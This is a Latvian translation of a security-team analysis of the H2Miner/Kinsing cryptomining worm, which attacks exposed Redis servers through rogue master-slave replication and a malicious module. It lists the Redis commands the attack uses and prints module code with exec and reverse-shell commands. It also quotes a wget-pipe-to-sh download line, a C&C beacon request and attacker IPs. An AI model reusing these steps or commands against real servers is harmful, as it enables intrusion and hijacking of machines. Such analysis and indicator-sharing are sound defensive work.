Ir atklāts jauns H2Miner tārpu uzliesmojums, kas izmanto Redis RCE

Pirms dienas vienam no mana projekta serveriem uzbruka līdzīgs tārps. Meklējot atbildi uz jautājumu "kas tas bija?" Es atradu lielisku Alibaba Cloud Security komandas rakstu. Tā kā es neatradu šo rakstu par Habré, es nolēmu to iztulkot īpaši jums <3

Ieraksts

Nesen Alibaba Cloud drošības komanda atklāja pēkšņu H2Miner uzliesmojumu. Šāda veida ļaunprātīgs tārps izmanto Redis autorizācijas trūkumu vai vājas paroles kā vārtejus uz jūsu sistēmām, pēc tam tas sinhronizē savu ļaunprātīgo moduli ar vergu, izmantojot galvenā un vergu sinhronizāciju, un visbeidzot lejupielādē šo ļaunprātīgo moduli uzbruktajā mašīnā un izpilda ļaunprātīgo instrukcijas.

Agrāk uzbrukumi jūsu sistēmām galvenokārt tika veikti, izmantojot metodi, kas ietver ieplānotos uzdevumus vai SSH atslēgas, kas tika ierakstītas jūsu datorā pēc tam, kad uzbrucējs bija pieteicies Redis. Par laimi, šo metodi nevar bieži izmantot atļauju kontroles problēmu vai dažādu sistēmas versiju dēļ. Tomēr šī ļaunprātīga moduļa ielādes metode var tieši izpildīt uzbrucēja komandas vai piekļūt čaulai, kas ir bīstama jūsu sistēmai.

Tā kā internetā ir izvietots liels Redis serveru skaits (gandrīz 1 miljons), Alibaba Cloud drošības komanda kā draudzīgu atgādinājumu iesaka lietotājiem nedalīties ar Redis tiešsaistē un regulāri pārbaudīt savu paroļu stiprumu un to, vai tās nav apdraudētas. ātra izvēle.

H2Miner

H2Miner ir ieguves robottīkls uz Linux balstītām sistēmām, kas var iebrukt jūsu sistēmā dažādos veidos, tostarp autorizācijas trūkuma dēļ Hadoop dzijas, Docker un Redis attālās komandu izpildes (RCE) ievainojamībās. Robottīkls darbojas, lejupielādējot ļaunprātīgus skriptus un ļaunprātīgu programmatūru, lai iegūtu jūsu datus, paplašinātu uzbrukumu horizontāli un uzturētu komandu un kontroles (C&C) sakarus.

Redis RCE

ZeroNights 2018. gadā ar zināšanām par šo tēmu dalījās Pāvels Toporkovs. Pēc versijas 4.0 Redis atbalsta spraudņa ielādes funkciju, kas lietotājiem sniedz iespēju ielādēt ar C kompilētos failus Redis, lai izpildītu konkrētas Redis komandas. Lai gan šī funkcija ir noderīga, tajā ir ievainojamība, kurā galvenā-pakalpojuma režīmā failus var sinhronizēt ar palīgu, izmantojot pilnas sinhronizācijas režīmu. To var izmantot uzbrucējs, lai pārsūtītu ļaunprātīgus failus. Kad pārsūtīšana ir pabeigta, uzbrucēji ielādē moduli uzbruktajā Redis instancē un izpilda jebkuru komandu.

Ļaunprātīgas programmatūras tārpu analīze

Nesen Alibaba Cloud drošības komanda atklāja, ka H2Miner ļaunprātīgās kalnraču grupas lielums pēkšņi ir dramatiski palielinājies. Saskaņā ar analīzi vispārējais uzbrukuma process ir šāds:

H2Miner izmanto RCE Redis pilnvērtīgam uzbrukumam. Uzbrucēji vispirms uzbrūk neaizsargātiem Redis serveriem vai serveriem ar vājām parolēm.

Tad viņi izmanto komandu config set dbfilename red2.so lai mainītu faila nosaukumu. Pēc tam uzbrucēji izpilda komandu slaveof lai iestatītu galvenā-slave replikācijas resursdatora adresi.

Kad uzbrukušais Redis gadījums izveido galveno un vergu savienojumu ar ļaunprātīgo Redis, kas pieder uzbrucējam, uzbrucējs nosūta inficēto moduli, izmantojot komandu fullresync, lai sinhronizētu failus. Pēc tam fails red2.so tiks lejupielādēts uzbrukuma datorā. Pēc tam uzbrucēji izmanto ielādes moduli ./red2.so, lai ielādētu šo so failu. Modulis var izpildīt komandas no uzbrucēja vai iniciēt reverso savienojumu (backdoor), lai piekļūtu uzbrukušajai mašīnai.

if (RedisModule_CreateCommand(ctx, "system.exec",
        DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
      if (RedisModule_CreateCommand(ctx, "system.rev",
        RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;

Pēc ļaunprātīgas komandas, piemēram, izpildes / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, uzbrucējs atiestatīs dublējuma faila nosaukumu un izlādēs sistēmas moduli, lai notīrītu pēdas. Tomēr fails red2.so joprojām paliks uzbruktajā datorā. Lietotājiem ieteicams pievērst uzmanību šāda aizdomīga faila klātbūtnei viņu Redis instances mapē.

Papildus dažu ļaunprātīgu procesu nogalināšanai, lai nozagtu resursus, uzbrucējs izmantoja ļaunprātīgu skriptu, lejupielādējot un izpildot ļaunprātīgus bināros failus 142.44.191.122/kinsing. Tas nozīmē, ka procesa nosaukums vai direktorija nosaukums, kas satur kinsing resursdatorā, var norādīt, ka šī iekārta ir inficēta ar šo vīrusu.

Saskaņā ar reversās inženierijas rezultātiem ļaunprogrammatūra galvenokārt veic šādas funkcijas:

• Failu augšupielāde un izpilde
• Kalnrūpniecība
• C&C sakaru uzturēšana un uzbrucēju komandu izpilde

Izmantojiet masscan ārējai skenēšanai, lai paplašinātu savu ietekmi. Turklāt C&C servera IP adrese programmā ir stingri iekodēta, un uzbrukušais resursdators sazināsies ar C&C sakaru serveri, izmantojot HTTP pieprasījumus, kur HTTP galvenē tiek identificēta zombiju (kompromitēta servera) informācija.

GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip

Citas uzbrukuma metodes

Tārpa izmantotās adreses un saites

/kinsing

• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh

s&c

• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193

Padome

Pirmkārt, Redis nedrīkst būt pieejams no interneta, un tas ir jāaizsargā ar spēcīgu paroli. Ir arī svarīgi, lai klienti pārbaudītu, vai Redis direktorijā nav faila red2.so un vai resursdatora faila/procesa nosaukumā nav "kinsing".

Avots: www.habr.com